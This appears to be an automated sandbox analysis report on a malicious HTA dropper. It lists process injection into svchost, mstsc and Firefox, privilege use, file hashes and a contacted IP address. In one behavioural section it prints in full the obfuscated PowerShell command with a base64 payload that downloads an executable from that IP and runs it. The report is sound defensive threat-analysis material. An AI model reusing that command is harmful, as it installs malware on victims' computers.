Malware Analysis Report

2024-12-07 16:48

Sample ID 241113-jcykbsxenh
Target seethebestthingswithgreatthingsbestthingswithgreatentry.hta
SHA256 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
Tags defense_evasion discovery execution
Score 8/10

Analysis Overview

Score 8/10

SHA256 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546

Threat Level: Likely malicious

The file seethebestthingswithgreatthingsbestthingswithgreatentry.hta was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

AutoIT Executable

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 07:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 07:32

Reported

2024-11-13 07:34

Platform

win7-20240903-en

Max time kernel

122s

Max time network

122s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2672 set thread context of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wlanext.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2440 wrote to memory of 2120 (4 entries) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2120 wrote to memory of 2844 (4 entries) N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 548 (4 entries) N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 548 wrote to memory of 1384 (4 entries) N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2120 wrote to memory of 2672 (4 entries) N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2672 wrote to memory of 2300 (5 entries) N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta"

C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE

"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'<base64 payload elided>'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp"

C:\Users\Admin\AppData\Roaming\wlanext.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

Network

Country Destination Domain Proto
US 107.173.4.61:80 107.173.4.61 tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 613d7cdc2b28524fb662528ebdfbf8d2
SHA1 ccbc1d360f44de08d51496e8aa9a97286665cc81
SHA256 b6c7ee152eca86efd07b20eb031036d300c448633037cb0a23ff1996afd219a1
SHA512 bd8e101cf662c80164caed51b07e5521ae3601bc2bfdbf73a67d8687a92efae18459be88af533f09efc49a6f8f7b3da0ecaafb543819e50794f4f12212fcec0e

\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline

MD5 d1237e9b54786c19a7dc2f3d5063ace9
SHA1 87fb71a3bf8b459d504e6fa64e64b3e090e0a340
SHA256 9683e7214772ac18f83fddce50409046d605f31f3259801cb9d9c10a2d9a2a0d
SHA512 a37f8622f2d5b7be68121530a31d6b987d8bae13c626d6bb5ffb25dfd121068133f03c61afff4b88e42788bf8c43650edc03d806cf0d5d1fefd7b9922886f373

\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.0.cs

MD5 4af98cbe7b888e1e92e1aa8a35732223
SHA1 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

\??\c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp

MD5 66d8d2dfe001de4d4e8f81fc35f06931
SHA1 6664cf4d0590f29de319bbb9890a85c2829b89ed
SHA256 3ab0fb6fd8f5d00eb6dbadb2f289f4dd6510d492cb0b7b20487a80716f6ebdf7
SHA512 152e09695ac3c88ca45dc03556329eb012e11f98e678a61fb0b852b6242b12e8ee08f66f055ab3ea5f8ddd2cbac6f054a1011f4bd51462a4346420c220101066

C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp

MD5 f6382cf166635d79677234beb37053e5
SHA1 8579fc096080813fbfab3eed9e220b658d0f0de0
SHA256 37a7e10da6d118a316ec2762f7f5eef1f6e5dcc66f0f9e4c39e8aea5400e33d3
SHA512 b631a63fe7c62260591f6ee9993656fb135b01bcbbe066a43518c8a3a1d97380323da7f60362d79ff0b4ddd0d3e4855ce9d839fed4a2df04913b02d9e44a4b5b

C:\Users\Admin\AppData\Local\Temp\utu7hahj.dll

MD5 adf417c79e94d2cdce28073c4b2233af
SHA1 6ecce128a7d3cb7053efec9eb30da28b1bf6c56b
SHA256 e5a43b30261078a571d27c447cbd61ffcfb6a301e9b6f8144c22b72b54196870
SHA512 1d11c92bae92e4b7fad9837e223aca29350268142baf0dc52eae2034018b7be859e337ee30eb4c604149764c3f2dc5c1c2c7edf7134b1e664fd46749a67c9105

C:\Users\Admin\AppData\Local\Temp\utu7hahj.pdb

MD5 fb1f4a558fed58915412c8948ec94b77
SHA1 d92a257761de843867d4a2631074a197ce5fa8e3
SHA256 cb4f08215d951f1b2ed21d5cbc98523c3e2c6c67384c933500a42449d9aa236c
SHA512 754f0554e577d89202ca6d6905156b80abc624c463c1e4c6090baf9f8a75b66e33b18a070f9d860ae8b7520728066e07ac8e3084ff53742540817d32f6c707dd

C:\Users\Admin\AppData\Roaming\wlanext.exe

MD5 7423e3013a2ca93513e9f1024dfe1cc8
SHA1 525281537f75c168ca4015df438bb83a7784931a
SHA256 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512 d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

C:\Users\Admin\AppData\Local\Temp\juvenilely

MD5 5fc0e7bec89d9a4e021d88dd1cf731b2
SHA1 26ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA512 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

memory/2300-44-0x0000000000400000-0x0000000000447000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 07:32

Reported

2024-11-13 07:34

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 540 set thread context of 4744 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 4744 set thread context of 4368 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 4744 set thread context of 2060 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mstsc.exe
PID 2060 set thread context of 4368 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mshta.exe
PID 2060 set thread context of 1380 N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files\Mozilla Firefox\Firefox.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wlanext.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Windows\SysWOW64\mstsc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 860 (3 entries) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 860 wrote to memory of 1632 (3 entries) N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 860 wrote to memory of 4108 (3 entries) N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4108 wrote to memory of 3324 (3 entries) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 860 wrote to memory of 540 (3 entries) N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 540 wrote to memory of 4744 (4 entries) N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 4368 wrote to memory of 2060 (3 entries) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mstsc.exe
PID 2060 wrote to memory of 1380 (2 entries) N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files\Mozilla Firefox\Firefox.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE

"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp" "c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP"

C:\Users\Admin\AppData\Roaming\wlanext.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\mstsc.exe

"C:\Windows\SysWOW64\mstsc.exe"

C:\Program Files\Mozilla Firefox\Firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

Network

Country Destination Domain Proto

Files

memory/860-0-0x0000000070EEE000-0x0000000070EEF000-memory.dmp

memory/860-1-0x00000000027C0000-0x00000000027F6000-memory.dmp

memory/860-3-0x0000000005340000-0x0000000005968000-memory.dmp

memory/860-2-0x0000000070EE0000-0x0000000071690000-memory.dmp

memory/860-4-0x0000000005170000-0x0000000005192000-memory.dmp

memory/860-6-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/860-5-0x0000000005290000-0x00000000052F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4emfy4h5.qmu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/860-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/860-17-0x0000000006100000-0x000000000611E000-memory.dmp

memory/860-18-0x0000000006120000-0x000000000616C000-memory.dmp

memory/1632-29-0x000000006D7A0000-0x000000006D7EC000-memory.dmp

memory/1632-28-0x0000000006300000-0x0000000006332000-memory.dmp

memory/1632-39-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

memory/1632-40-0x0000000006F30000-0x0000000006FD3000-memory.dmp

memory/1632-41-0x00000000076A0000-0x0000000007D1A000-memory.dmp

memory/1632-42-0x0000000007060000-0x000000000707A000-memory.dmp

memory/1632-43-0x00000000070C0000-0x00000000070CA000-memory.dmp

memory/1632-44-0x00000000072F0000-0x0000000007386000-memory.dmp

memory/1632-45-0x0000000007260000-0x0000000007271000-memory.dmp

memory/1632-46-0x0000000007290000-0x000000000729E000-memory.dmp

memory/1632-47-0x00000000072A0000-0x00000000072B4000-memory.dmp

memory/1632-48-0x00000000073B0000-0x00000000073CA000-memory.dmp

memory/1632-49-0x00000000072E0000-0x00000000072E8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline

MD5 744bf541171f1e1bbaa2092eb9dac51e
SHA1 2721a9e3fa7254d57001fb0381c63afffb5f40f6
SHA256 93ccc5b8f167de57da742d2026c1c68e2ab921aa60b38f4ff720cf5ff302f23c
SHA512 f89c331ec2ee7b3babd31607ee4281c944b8b33d7789aa0e473281596494a40eed0760dac271ba44cd9033fb8afb8f0a299e48ef7f2b9bca6b241f474e19ce1d

\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.0.cs

MD5 4af98cbe7b888e1e92e1aa8a35732223
SHA1 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP

MD5 be33b43dc0a0d0ee9e8d8611ff12d29e
SHA1 79e45ab90c76582617857f1eda0694fce579c0f1
SHA256 a062ff40d8dc0c461ae2fdd134811b9c73ac332899b6fbb7eb42ffcf2e8a0cdd
SHA512 cff8adfedb156940b0bd49bd0fb918dd38884bc611feab5d70aa20d100495802a2649b4726e85669246b864c2ea529646e6ce35677913b5d7c78611267a3fc99

C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp

MD5 f4716bfe1bd302f1b918187fa8b23a63
SHA1 738656598aad26b102a02ed4faaafce1c8233c9b
SHA256 8633ce07fce1d7b0738c0b6db11893322d0e4d6e77438a2be19f117836efdad7
SHA512 092fb24eff474672bf06a82589df913807e8e40bc4ab366a957540b6dba1683f42e61104a2d3ed10d1967040bad26c7d67b2c7906e6b57ef112966eaa759d37b

C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.dll

MD5 e17a0872ce502543e77128998863fa8b
SHA1 3a0c88f8827eb9966c24cffbdc54174ac64c1f3c
SHA256 601d211643c9c809c9c0264cee2a1687627c4f1a4ef8890f08fa73cf24bd0db8
SHA512 77139ac6c8c6d31f2377282e86100dc3d0e9078242c7b6eb81517fd7be57490919e3c58a5c52aed982c314d0f144ad20e9e74f683b929b74e000398793f52aae

memory/860-64-0x00000000066C0000-0x00000000066C8000-memory.dmp

memory/860-70-0x0000000070EEE000-0x0000000070EEF000-memory.dmp

memory/860-71-0x0000000070EE0000-0x0000000071690000-memory.dmp

memory/860-72-0x00000000074D0000-0x00000000074F2000-memory.dmp

memory/860-73-0x0000000008560000-0x0000000008B04000-memory.dmp

C:\Users\Admin\AppData\Roaming\wlanext.exe

MD5 7423e3013a2ca93513e9f1024dfe1cc8
SHA1 525281537f75c168ca4015df438bb83a7784931a
SHA256 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512 d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersHeLl.ExE.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5f8dfb461b6247744a34510486518a8
SHA1 c7867fc3ce3027fbec8bed02f2d2ecb3f9daf5bd
SHA256 5090beccaeebcc44cd6efe04b0948c62130fe755597ef8a417a5eb5f4d731fb0
SHA512 c46fdf496fc842b4ab25491b3cc0a20f73c68cf3167a27bf0457ab5036878614fe40bb86dc94d1fb3d094f0c6a38a45034a93102a24c88d920e33f8e8b4ace9f

memory/860-87-0x0000000070EE0000-0x0000000071690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\autE0CB.tmp

MD5 5fc0e7bec89d9a4e021d88dd1cf731b2
SHA1 26ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA512 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

memory/4744-101-0x0000000000400000-0x0000000000447000-memory.dmp

memory/2060-102-0x0000000000D50000-0x0000000000D94000-memory.dmp

memory/2060-103-0x0000000000D50000-0x0000000000D94000-memory.dmp

memory/4368-104-0x00000000050E0000-0x00000000051B1000-memory.dmp

memory/1380-111-0x000001CC5D280000-0x000001CC5D39F000-memory.dmp